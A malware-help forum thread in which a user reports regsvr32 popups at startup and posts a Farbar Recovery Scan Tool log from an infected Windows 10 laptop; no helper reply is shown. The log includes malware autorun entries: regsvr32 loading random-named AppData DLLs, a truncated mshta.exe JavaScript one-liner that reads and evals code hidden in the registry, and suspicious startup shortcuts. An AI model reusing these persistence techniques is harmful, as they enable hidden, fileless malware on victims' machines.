regsvr32 problem



#1
uwek007


Untitled.png

 

Basically, when I start my laptop, these two things will pop up. I've been reading some of the posts which have the same problem as this. I will paste the result from FRST.




#2
uwek007

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-11-2016
Ran by taurus silver (administrator) on TAURUS-SILVER (28-11-2016 04:38:26)
Running from C:\Users\taurus silver\Downloads\Programs
Loaded Profiles: taurus silver (Available Profiles: taurus silver)
Platform: Windows 10 Home Single Language Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
() C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Condusiv Technologies) C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe
(ASUS) C:\Program Files\ASUS\ASUS FlipLock\FlipService.exe
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Freemake) C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(Nitro PDF Software) C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe
() C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
(Dassault Systemes) D:\Catia\intel_a\code\bin\CATSysDemon.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
() C:\Program Files\ASUS\ASUS FlipLock\FlipController.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(ASUSTek Computer INC.) C:\ProgramData\AsTouchPanel\AsPatchTouchPanel64.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
() C:\Program Files\ASUS\ASUS FlipLock\WifiPowerManager.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Logitech Inc.) C:\Program Files\Logitech\Gaming Software\LWEMon.exe
(Akamai Technologies, Inc.) C:\Users\taurus silver\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\taurus silver\AppData\Local\Akamai\netsession_win.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Program Files (x86)\UCBrowser\Application\5.7.16817.1002\UCAgent.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Start WingMan Profiler] => C:\Program Files\Logitech\Gaming Software\LWEMon.exe [190536 2010-06-14] (Logitech Inc.)
HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-15] (NVIDIA Corporation)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.2.11.570\ASUSWSLoader.exe [63968 2016-08-12] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25673776 2016-11-08] (Dropbox, Inc.)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [75776 2016-06-09] ()
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-07-01] (Autodesk, Inc.)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Akamai NetSession Interface] => C:\Users\taurus silver\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Office Timeline Performance Helper] => C:\Program Files (x86)\Office Timeline\Current\OfficeTimelineStartup.exe [15424 2015-09-02] (OfficeTimeline LLC)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3924024 2016-04-17] (Tonec Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Impksoft] => C:\Users\taurus silver\AppData\Local\Impksoft\tmp790D.exe
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Atcwworks] => regsvr32.exe "C:\Users\taurus silver\AppData\Local\Atcwworks\lwfbitpm.dll" <===== ATTENTION
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Ezcption] => C:\Windows\SysWOW64\regsvr32.exe "C:\Users\taurus silver\AppData\Local\Impksoft\mtjjempv.dll"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [uTorrent] => C:\Users\taurus silver\AppData\Roaming\uTorrent\uTorrent.exe [1741136 2016-09-24] (BitTorrent Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Google Update] => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe [153752 2016-07-29] (Google Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [**imcc<*>] => "C:\Users\taurus silver\AppData\Local\072a96d0\5c23265f.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [**rkcnffng<*>] => "C:\WINDOWS\system32\mshta.exe" javascript:THWN19a="UJPphu";O9O0=new%20ActiveXObject("WScript.Shell");Lhpla0H="k32J4";uWD0f=O9O0.RegRead("HKCU\\software\\jvjtduhgj\\cdweuob");xJe3lf="J4nBkj25";eval(uW (the data entry has 17 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Policies\Explorer: [] 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\MountPoints2: {ccf6f375-7528-11e6-8338-08626654ee0c} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\MountPoints2: {d86e9ae3-5640-11e6-8322-08626654ee0c} - "E:\Lenovo_Suite.exe" 
HKLM\...\Providers\enxfdq9s: D:\pendrive\\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\gcsolqyi: D:\_jvm\\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\gvqraqgu: D:\Arduino\\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\uf14wv1f: C:\_\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\xjj75ex2: C:\\local64spl.dll [142336 2016-09-28] ()
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.2.11.570\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.2.11.570\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.2.11.570\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-08-24] ()
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
Startup: C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\886b6a28.lnk [2016-11-28]
ShortcutTarget: 886b6a28.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4571635.lnk [2016-10-18]
ShortcutTarget: d4571635.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-05-15]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{186c8f47-4084-48bc-be63-75f621f55705}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{186c8f47-4084-48bc-be63-75f621f55705}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{b4fb2577-0d5d-4ddb-9e7c-57d2b953c7db}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{b4fb2577-0d5d-4ddb-9e7c-57d2b953c7db}: [DhcpNameServer] 10.0.8.19 10.0.8.20
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://malaysia.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://malaysia.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-my/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM -> {1b31c9d2-7135-442b-bb93-7c002172adc6} URL = 
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fremkfs_16_24&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCtByCtN1L2XzutAtFtBtBtFtAtFzztN1L1Czu1BtCtDtN1L1G1B1V1N2Y1L1Qzu2StBzytC0EtBtAtC0EtGyC0D0D0AtGtDzytC0EtGtAyDtCyEtGtD0D0E0CtAtA0FyCtAyBzy0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyE%26cr%3D964303875%26a%3Dwbf_fremkfs_16_24%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> {1b31c9d2-7135-442b-bb93-7c002172adc6} URL = 
